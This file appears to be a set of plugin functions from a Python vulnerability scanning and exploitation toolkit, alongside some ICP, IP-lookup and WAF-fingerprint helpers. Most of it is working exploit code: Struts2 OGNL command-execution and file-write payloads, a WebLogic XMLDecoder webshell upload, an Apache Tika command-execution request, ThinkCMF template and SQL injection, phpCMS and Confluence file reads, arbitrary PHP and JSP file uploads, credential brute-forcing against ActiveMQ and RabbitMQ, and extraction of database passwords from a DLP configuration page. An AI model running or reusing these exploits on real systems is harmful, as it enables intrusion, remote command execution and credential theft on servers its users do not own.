def prove(data): ''' 比较耗时,建议单独跑脚本 ''' data = init(data, 'dedecms') if data['base_url']: characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#" _data = { "_FILES[mochazz][tmp_name]": "./{p}<</images/adminico.gif", "_FILES[mochazz][name]": 0, "_FILES[mochazz][size]": 0, "_FILES[mochazz][type]": "image/gif" } for a in ['', 'dedecms/']: url = data['base_url'] + a + 'tags.php' back_dir = "" flag = 0 res = curl('get', url) if res!=None and res.status_code ==200: for num in range(1, 7): if flag ==1 : break for pre in itertools.permutations(characters, num): pre = ''.join(list(pre)) _data["_FILES[mochazz][tmp_name]"] = _data["_FILES[mochazz][tmp_name]"].format(p=pre) r = curl('post', url, data=_data) if r!=None: if "Upload filetype not allow !" not in r.text and r.status_code == 200: flag = 1 back_dir = pre _data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" break else: _data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" flag = 0 x = 0 for i in range(30): if flag == 1: x = i break for ch in characters: if ch == characters[-1]: flag = 1 x = i break _data["_FILES[mochazz][tmp_name]"] = _data["_FILES[mochazz][tmp_name]"].format(p=back_dir + ch) r = curl('post', url, data=_data) if r != None: if "Upload filetype not allow !" not in r.text and r.status_code == 200: back_dir += ch _data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" break else: _data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" if x < 29 and flag ==1: data['flag'] = 1 data['data'].append({"url": data['base_url'] + a + back_dir}) data['res'].append({"info": data['base_url'] + a + back_dir, "key": 'dede_manage'}) return data
def prove(data): data = init(data, 'phpcms') if data['base_url']: headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.4 (KHTML, like Gecko) Chrome/6.0.481.0 Safari/534.4"} for path in ["", "phpcms/"]: url1 = data['base_url'] + path +"index.php?m=wap&c=index&a=init&siteid=1" res1 = curl('get',url1,headers = headers) if res1 !=None: for cookie in res1.cookies: if '_siteid' in cookie.name: userid = cookie.value url2 = data['base_url'] + path +"index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=pad%3Dx%26i%3D1%26modelid%3D1%26catid%3D1%26d%3D1%26m%3D1%26s%3Dindex%26f%3D.p%25253chp" _data1 = {'userid_flash': userid} res2 = curl('post', url=url2, data=_data1,headers = headers) if res2 != None: for cookie in res2.cookies: if '_att_json' in cookie.name: att_json = cookie.value url3 = data['base_url'] + path +"index.php?m=content&c=down&a=init&a_k=" + att_json res3 = curl('get', url3,headers = headers) if res3 !=None: file = re.findall(r'<a href="(.+?)"', res3.text)[0] url4 = data['base_url'] + path + 'index.php' + file res4 = curl('get', url4,headers = headers) if res4 !=None: if '<?php' in res4.text: data['flag'] = 1 data['data'].append({"url": url4}) data['res'].append({"info": url1, "key": "phpcms v9 download",'connect':res4.text}) return data return data
def prove(data): data = init(data, 'weblogic') if data['base_url']: headers = {"Content-Type": "text/xml"} url = data['base_url'] + 'wls-wsat/CoordinatorPortType' ran = str(random.randint(100000, 999999)) poc = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/' + ran + '.txt</string><void method="println"><string>xmldecoder_vul_test</string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>' try: result = curl('post', url, data=poc, headers=headers) targeturl = data['base_url'] + "/bea_wls_internal/" + ran + ".txt" result = curl('get', targeturl) if result and str( result.status_code ) == '200' and 'xmldecoder_vul_test' in result.text: data['flag'] = 1 data['data'].append({"page": '/wls-wsat/CoordinatorPortType'}) data['res'].append({"info": url, "key": targeturl}) else: ran = str(random.randint(100000, 999999)) poc = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/' + ran + '.txt</string><void method="println"><string>xmldecoder_vul_test</string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>' result = curl('post', url, data=poc, headers=headers) targeturl = data['base_url'] + "/wls-wsat/" + ran + ".txt" result = curl('get', url) if result and str( result.status_code ) == '200' and 'xmldecoder_vul_test' in result.text: data['flag'] = 1 data['data'].append( {"page": '/wls-wsat/CoordinatorPortType'}) data['res'].append({"info": targeturl, "key": url}) except Exception as e: pass return data
def upload(data=None): data = init(data, 'weblogic') if data['base_url']: headers = {"Content-Type": "text/xml"} url = data['base_url'] + 'wls-wsat/CoordinatorPortType' result = curl('post', url, data=shellpoc1, headers=headers) targeturl = data['base_url'] + "/bea_wls_internal/ahtest.jsp" result = curl('get', targeturl) if str(result.status_code) == '200' and 'ahtest' in result.text: data['flag'] = 1 data['data'].append({"page": '/wls-wsat/CoordinatorPortType'}) data['res'].append({ "info": url, "key": targeturl + "?pwd=ahtest&cmd=whoami" }) else: result = curl('post', url, data=shellpoc2, headers=headers) targeturl = data['base_url'] + "/wls-wsat/ahtest.jsp" result = curl('get', targeturl) if str(result.status_code) == '200' and 'ahtest' in result.text: data['flag'] = 1 data['data'].append({"page": '/wls-wsat/CoordinatorPortType'}) data['res'].append({ "info": targeturl + "?pwd=ahtest&cmd=whoami", "key": "/wls-wsat/CoordinatorPortType" }) return data
def prove(data): init(data,'thinkcmf') if data['base_url']: url = data[ 'base_url'] + "index.php?g=Comment&m=Widget&a=fetch" _data = "templateFile=/../public/index&prefix=''&content=<php>file_put_contents('bytestforme1.php','<?php phpinfo();')</php>" res = curl('post', url,data = _data) if res != None and res.status_code == 200: res = curl('get', data['base_url'] + "/bytestforme1.php") if res != None and res.status_code == 200 and 'php.ini' in res.text: data['flag'] = 1 data['data'].append({"flag": url}) data['res'].append({"info": url, "key": "thinkcmf 2.2.3 template inject"}) return data
def upload(data): data = init(data, 'struts') if data['url'] != None: despath = data['despath'] content = _read_file(data['srcpath']) prove_poc = "redirect%3a%24%7b%23req%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27)%2c%23res%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27)%2c%23res.getWriter().print(%22oko%22)%2c%23res.getWriter().print(%22kok%2f%22)%2c%23res.getWriter().print(%23req.getContextPath())%2c%23res.getWriter().flush()%2c%23res.getWriter().close()%2cnew+java.io.BufferedWriter(new+java.io.FileWriter(%22%PATH%%22)).append(%23req.getParameter(%22shell%22)).close()%7d&shell=%FILECONTENT%".replace("%PATH%", despath).replace("%FILECONTENT%", content) try: headers = {"Content-Type": "application/x-www-form-urlencoded"} curl('get', data['url'], data=prove_poc, headers=headers) data['flag'] = 1 data['data'].append({"poc": prove_poc}) data['res'].append({"info": data['despath'],"key":"upload"}) except: pass return data
def prove(data): data = init(data, 'web') if data['url']: try: waf = None res = curl('get', data['url']) header = res.headers html = res.text mark_list = [] marks = _dna.strip().splitlines() for mark in marks: name, location, key, value = mark.strip().split("|", 3) mark_list.append([name, location, key, value]) for mark_info in mark_list: name, location, key, reg = mark_info if location == "headers": if re.search(reg, header, re.I) and key in header: waf = name break if location == "index": if re.search(reg, html, re.I): waf = name break m = re.search('<title>(.*)?<\/title>', html) if m: print(m.group(1), 'title') if waf != None: data['flag'] = 1 data['res'].append({"info": waf, "key": "waf"}) except: pass return data
def prove(data): data = init(data, 'confluence') if data['base_url']: filename = "../web.xml" limitSize = 100 payload = data['base_url'] + "rest/tinymce/1/macro/preview" headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Referer": data['base_url'] + "pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&", "Content-Type": "application/json; charset=utf-8" } _data = '{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename try: r = curl('post', payload, data=_data, headers=headers) if r.status_code == 200 and "</web-app>" in r.text: m = re.search('<web-app[\s\S]+<\/web-app>', r.text) if m: content = m.group()[:limitSize] data['flag'] = 1 data['data'].append({"content": content}) data['res'].append({"info": payload, "key": filename}) except: pass return data
def exec(data): init(data, 'apache') if data['base_url']: headers = { "X-Tika-OCRTesseractPath": "\"cscript\"", "X-Tika-OCRLanguage": "//E:Jscript", "Expect": "100-continue", "Content-type": "image/jp2", "Connection": "close" } url = data['base_url'] + "meta" jscript = '''var oShell = WScript.CreateObject("WScript.Shell"); var oExec = oShell.Exec('cmd /c {}'); '''.format(data['cmd']) try: res = curl('put', url, headers=headers, data=jscript) if res != None and "X-Parsed-By" in res.text and "tika.parse" in res.text: data['flag'] = 1 data['data'].append({"flag": url}) data['res'].append({ "info": res.text, "key": "Apache Tika-server RCE" }) except: pass return data
def exec(data=None): data = init(data, 'struts') if data['url'] != None: cmd = data['cmd'] exec_poc = '''%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='%COMMAND%').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x00b''' headers = {} try: files = { "test": (exec_poc.replace("%COMMAND%", cmd), "text/plain") } r = curl('post', data['url'], headers=headers, files=files, stream=True).text res = "" try: for line in r.iter_lines(): res += str(line) + '\r\n' except: res = str(res) data['flag'] = 1 data['data'].append({"poc": exec_poc}) data['res'].append({"info": res, "key": cmd}) except: pass return data
def _ICPbybeianbeian(domain, dic): flag = False for j in range(3): flag = False try: url = "http://www.beianbeian.com/search/" + domain.strip(' ') result = curl('get', url) soup = BeautifulSoup(result.text, "html5lib") info1 = info2 = None alist = soup.find_all('a', href=re.compile('/beianxinxi/')) if len(alist) > 0: info1 = alist[0].get_text() div = soup.find(id="pass_time") info2 = div.get_text() ICPinfo = domain if info1 != None and info2 != None: ICPinfo += ":" + info1 + ":" + info2 if ICPinfo != domain and ICPinfo not in dic['ICP']: dic['ICP'].append(ICPinfo) flag = True dic['flag'] = True dic['beianbeian_icp'] = True return dic, flag except: pass logger.debug("Error for ICP(%s)%s by beianbeian" % (dic['id'], domain)) return dic, flag
def upload(data=None): data = init(data, 'struts') if data['url'] != None: upload_poc = '''debug=command&expression=#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.getWriter().print("oko"),#res.getWriter().print("kok/"),#res.getWriter().print(#req.getContextPath()),#res.getWriter().flush(),#res.getWriter().close(),new java.io.BufferedWriter(new java.io.FileWriter(%PATH%)).append(#req.getParameter("shell")).close()&shell=%FILECONTENT%''' despath = data['despath'] content = _read_file(data['srcpath']) headers = {} try: headers["Content-Type"] = "application/x-www-form-urlencoded" curl('get', data['url'],params=upload_poc.replace("%PATH%", despath).replace("%FILECONTENT%", content),headers=headers) data['flag'] = 1 data['data'].append({"poc": upload_poc}) data['res'].append({"info": data['despath'],"key":"upload"}) except: pass return data
def prove(data): data = init(data, 'activemq') if data['base_url']: usernamedic = _read_dic(data['d1']) if 'd1' in data.keys( ) else _read_dic('dict/activemq_usernames.txt') passworddic = _read_dic(data['d2']) if 'd2' in data.keys( ) else _read_dic('dict/activemq_passwords.txt') url = data['base_url'] + "admin/" for linef1 in usernamedic: username = linef1.strip('\r').strip('\n') for linef2 in passworddic: try: password = (linef2 if '%user%' not in linef2 else str(linef2).replace( "%user%", str(username))).strip('\r').strip('\n') key = b64encode(":".join([username, password])) data['headers']["Authorization"] = 'Basic %s' % key res = curl('get', url) if 'Console' in res.text: data['flag'] = 1 data['data'].append({ "username": username, "password": password }) data['res'].append({ "info": username + "/" + password, "key": "Authorization: " + key }) except Exception: pass return data
def _ICPsobeian(domain, dic): flag = False for j in range(3): flag = False try: ICPinfo = domain ICPTime = "None" url = "http://www.sobeian.com/search?key=" + domain.strip( ' ') + "/" result = curl('get', url) soup = BeautifulSoup(result.text, "html5lib") for span in soup.find_all("span", class_="list-group-item clearfix"): alist = span.find_all('a', href=re.compile('/icp/details/')) if domain in alist[2].get_text().split(' '): ICPinfo += ":" + alist[1].get_text() temp = re.search(r'\d{4}\-\d{2}\-\d{2}', span.get_text()) if temp != None: ICPTime = temp.group() ICPinfo += ":" + ICPTime dic['ICP'].append(ICPinfo) flag = True break dic['flag'] = True dic['sobeian_icp'] = True return dic, flag except: pass logger.debug("Error for ICP(%s)%s by sobeian" % (dic['id'], domain)) return dic, flag
def _ICPbyaizhan(domain, dic): flag = False for j in range(3): flag = False try: url = "https://icp.aizhan.com/" + domain.strip(' ') + "/" result = curl('get', url) soup = BeautifulSoup(result.text, "html5lib") div = soup.find(id="icp-table") ICPinfo = domain if div != None: for span in div.find_all('span'): info = span.get_text() if info != None: ICPinfo += ":" + info if ICPinfo != domain and ICPinfo not in dic['ICP']: dic['ICP'].append(ICPinfo) flag = True dic['flag'] = True dic['aizhan_icp'] = True return dic, flag except: pass logger.debug("Error for ICP(%s)%s by aizhan" % (dic['id'], domain)) return dic, flag
def prove(data): try: hostname = socket.gethostbyname(data['target_host']) except: return data info = hostname data['flag'] = 1 url = "http://ip.taobao.com/service/getIpInfo.php?ip=%s" % hostname while True: try: res = curl('get', url) if res.status_code == 200: jsondata = json.loads(res.text) if jsondata['code'] == 1: jsondata['data'] = {'region': '', 'city': '', 'isp': ''} else: if jsondata['data']['region']: info += " | Region: " + jsondata['data']['region'] if jsondata['data']['isp']: info += " | ISP: " + jsondata['data']['isp'] if jsondata['data']['city']: info += " | City: " + jsondata['data']['city'] break elif res.status_code == 502: time.sleep(0.3) else: break except : pass data['res'].append({"info": info, "key": 'IP Information'}) return data
def _by114best(target, dic): for j in range(3): try: headers = {} url = "http://www.114best.com/ip/114.aspx?w=" + target.strip(' ') headers['X-Forwarded-For'] = '.'.join([ str(random.randint(0, 255)), str(random.randint(0, 255)), str(random.randint(0, 255)), str(random.randint(0, 255)) ]) result = curl('get', url) soup = BeautifulSoup(result.text, "html5lib") div = soup.find(id="rl") for span in div.find_all('span'): mydomain = span.get_text().replace(" ", "").replace( "\r", "").replace("\n", "") if mydomain not in dic['domain']: dic['domain'].append(mydomain) dic['114best_domain'] = True dic['flag'] = True return dic except: pass logger.debug("Error for (%s)%s by 114best" % (dic['id'], target)) return dic
def prove(data): data = init(data, 'web') if data['base_url'] != None: try: res = curl('options',data['base_url']+"/testbyme") allow = res.headers['Allow'] if 'PUT' in allow: for _url in [str(int(time.time())) + '.jsp/',str(int(time.time())) + '.jsp::$DATA',str(int(time.time())) + '.jsp%20']: url = data['base_url'] + _url res = curl('put', url) if res.status == 201 or res.status == 204: data['flag'] = 1 data['data'].append({"method": "put"}) data['res'].append({"info": url,"key":"PUT"}) except: pass return data
def upload(data): data = init(data, 'struts') if data['url'] != None: despath = data['despath'] content = _read_file(data['srcpath']) headers = {} headers[ "Content-Type"] = """%{(#test='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@getRequest()).(#[email protected]@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#fs=new java.io.FileOutputStream("%PATH%")).(#out=#res.getOutputStream()).(@org.apache.commons.io.IOUtils@copy(#req.getInputStream(),#fs)).(#fs.close()).(#out.print('oko')).(#out.print('kok/')).(#out.print(#req.getContextPath())).(#out.close())}""".replace( "%PATH%", despath).replace("%FILECONTENT%", content) try: curl('get', data['url'], headers=headers) data['flag'] = 1 data['data'].append({"headers": headers}) data['res'].append({"info": data['despath'], "key": 'upload'}) except: pass return data
def _gethtml(url): try: u = curl('get',url) content = u.text return {"html":content,"code":u.status_code,"url":url} except Exception as e: # print(e) # _status_flag = _status_flag - 1 return {"html":"", "code":0, "url": url}
def prove(data): data = init(data, 'rabbitmq') if data['base_url']: usernamedic = _read_dic(data['d1']) if 'd1' in data.keys( ) else _read_dic('dict/rabbitmq_usernames.txt') passworddic = _read_dic(data['d2']) if 'd2' in data.keys( ) else _read_dic('dict/rabbitmq_passwords.txt') url = data['base_url'] + 'api/whoami' res = curl('get', url) if res == 401: for linef1 in usernamedic: username = linef1.strip('\r').strip('\n') for linef2 in passworddic: try: password = (linef2 if '%user%' not in linef2 else str(linef2).replace( "%user%", str(username))).strip('\r').strip('\n') key = str( b64encode( bytes(":".join([username, password]), 'utf-8')), 'utf-8') headers = {"Authorization": 'Basic %s' % key} res = curl('get', url, headers=headers) if res != 401 and 'Console' in res.text: data['flag'] = 1 data['data'].append({ "username": username, "password": password }) data['res'].append({ "info": username + "/" + password, "key": "Authorization: " + ":".join([username, password]) }) return data except Exception: pass return data
def prove(data): xmldata = ''' <?xml version="1.0" encoding="UTF-8"?> <root> dGVzdCBieSBtZQ== </root> ''' data = init(data,'ucms') if data['base_url']: for url in [data['base_url'], data['url']]: myurl = url + '/ucms/cms/client/uploadpic_html.jsp?toname=justfortest.jsp&diskno=xxxx' res = curl('post',myurl,data = xmldata) if res != None and res.status_code is 200: myurl = url + '/ucms/cms-data/temp_dir/xxxx/temp.files/justfortest.jsp' testres = curl('post',myurl,data = xmldata) if testres != None and 'test by me' in testres.text: data['flag'] = 1 data['data'].append({"page": myurl}) data['res'].append({"info": myurl, "key": "ucms upload"}) return data
def upload(data=None): data = init(data, 'struts') if data['url'] != None: upload_poc = '''%{(#test='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@getRequest()).(#[email protected]@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('start:')).(#fs=new java.io.FileOutputStream(%PATH%)).(#out=#res.getOutputStream()).(@org.apache.commons.io.IOUtils@copy(#req.getInputStream(),#fs)).(#fs.close()).(#out.print('oko')).(#out.print('kok/:end')).(#out.print(#req.getContextPath())).(#out.close())}''' despath = data['despath'] content = _read_file(data['srcpath']) try: _data = 'name=' + upload_poc.replace("%PATH%", despath).replace( "%FILECONTENT%", content) + '&age=a&__checkbox_bustedBefore=true&description=s' curl('post', data['base_url'] + '/struts2-showcase/integration/saveGangster.action', data=_data) data['flag'] = 1 data['data'].append({"poc": upload_poc}) data['res'].append({"info": despath, "key": 'upload'}) except: pass return data
def prove(data): data = init(data, 'php7cms') if data['base_url']: for path in ["", "php7cms/"]: postData = {'data': '<?php phpinfo()?>'} url1 = data[ 'base_url'] + path + 'index.php?s=api&c=api&m=save_form_data&name=/../../../adminsss.php"' res = curl('post', url1, data=postData) if res != None: url2 = data['base_url'] + path + 'adminsss.php' res = curl('get', url2) if res != None and "php.ini" in res.text: data['flag'] = 1 data['data'].append({"url": url2}) data['res'].append({ "info": url1, "key": "php7cms getshell" }) break return data
def prove(data): data = init(data,'web') if data['url']: result = curl('get', data['url']) if result != None: status = result.status_code # Text webkeydic = _read_dic(data['dic_one']) if 'dic_one' in data.keys() else _read_dic('dict/web_content_key.txt') content = result.text key = '' for searchkey in webkeydic: searchkey = str(searchkey, 'utf-8').replace("\r", "").replace("\n", "") try: if searchkey in content: key += searchkey + ',' data['flag'] = 1 except Exception as e: print(e) pass # title soup = BeautifulSoup(result.text, "html5lib") if soup != None: codes = ['utf-8', 'gbk'] title = soup.title if title == None or title.string == '': title = "[None Title]".encode('utf-8') else: if result.encoding != None: try: title = title.string.encode(result.encoding) codes.append(result.encoding) except: title = "[Error Code]".encode('utf-8') else: title = title.string codes.append(type) for j in range(0, len(codes)): try: title = title.decode(codes[j]).strip().replace("\r", "").replace("\n", "") break except: continue finally: if j + 1 == len(codes): title = '[Error Code]' else: title = '[None Title]' if data['flag'] == 1: data['res'].append({"info": title, "key": key[:-1], "status": status}) return data
def prove(data): data = init(data,'yst_dlp') if data['base_url']: sql_result = None name = '' try: url = data['base_url'] + '/CDGServer3/help/getEditionInfo.jsp' r = curl('get',url) if r : res = r.text soup = BeautifulSoup(res,'html5lib') if '授权用户' in res: name = soup.select('body > div:nth-of-type(2) > table > tbody > tr:nth-of-type(6) > td:nth-of-type(2) > input[type="text"]') else: name = soup.select( 'body > div:nth-of-type(2) > table > tbody > tr:nth-of-type(5) > td:nth-of-type(2) > input[type="text"]') if len(name) > 0: name = name[0]['value'] except: name = '' try: url = data['base_url'] + '/CDGServer3/SystemConfig' _data = {'command':'Login','verifyCodeDigit':'dfd','name':'configadmin','pass':'******'} r = curl('post',url,data = _data) if r : res = r.content soup = BeautifulSoup(res, 'html5lib') sql_user = soup.select('#est\\.connection\\.username')[0]['value'] sql_pass = soup.select('#est\\.connection\\.password')[0]['value'] sql_result = name+ '/' + sql_user + '/' + sql_pass except: sql_result = None if sql_result: if _socket_connect(data['target_host'],1433): sql_result = data['target_host'] + ":1433/" + sql_result data['flag'] = 1 data['data'].append({"page": url}) data['res'].append({"info": sql_result, "key": "configadmin/123456"}) return data
def prove(data): init(data,'thinkcmf') if data['base_url']: url = data[ 'base_url'] + "index.php?g=Portal&m=Article&a=edit_post" _data = 'term=123&post[post_title]=123&post[post_title]=aaa&post_title=123&post[id][0]=bind&post[id][1]=0 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))' res = curl('post', url,data = _data) if res != None and ':XPATH' in res.text: data['flag'] = 1 data['data'].append({"flag": url}) data['res'].append({"info": url, "key": "thinkcmf 2.2.3 sql"}) return data
def upload(data=None): data = init(data, 'struts') if data['url'] != None: upload_poc = '''%{(#test='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@getRequest()).(#[email protected]@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#filecontent='%FILECONTENT%').(new java.io.BufferedWriter(new java.io.FileWriter('%PATH%')).append(new java.net.URLDecoder().decode(#filecontent,'UTF-8')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}\0b''' despath = data['despath'] content = _read_file(data['srcpath']) headers = {} try: files = { "test": (upload_poc.replace("%PATH%", despath).replace("%FILECONTENT%", content), "text/plain") } curl('post', data['url'], headers=headers, files=files) data['flag'] = 1 data['data'].append({"poc": upload_poc}) data['res'].append({"info": despath, "key": 'upload'}) except: pass return data
def upload(data=None): data = init(data, 'struts') if data['url'] != None: upload_poc = '''method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23req.getContextPath()),%23w.close(),1?%23xx:%23request.toString&shellname=%PATH%&shellContent=%FILECONTENT%&encoding=UTF-8&pp=%2f&info1=oko&info2=kok%2f''' despath = data['despath'] content = _read_file(data['srcpath']) headers = {} try: headers["Content-Type"] = "application/x-www-form-urlencoded" curl('get', data['url'], params=upload_poc.replace("%PATH%", despath).replace( "%FILECONTENT%", content), headers=headers) data['flag'] = 1 data['data'].append({"poc": upload_poc}) data['res'].append({"info": despath, "key": "upload"}) except: pass return data
def prove(data): data = init(data, 'web') if data['base_url'] != None: try: res = curl('options', data['base_url'] + "/testbyme") allow = res.headers['Allow'] data['flag'] = 1 data['data'].append({"method": "options"}) data['res'].append({"info": allow, "key": "OPTIONS"}) except: pass return data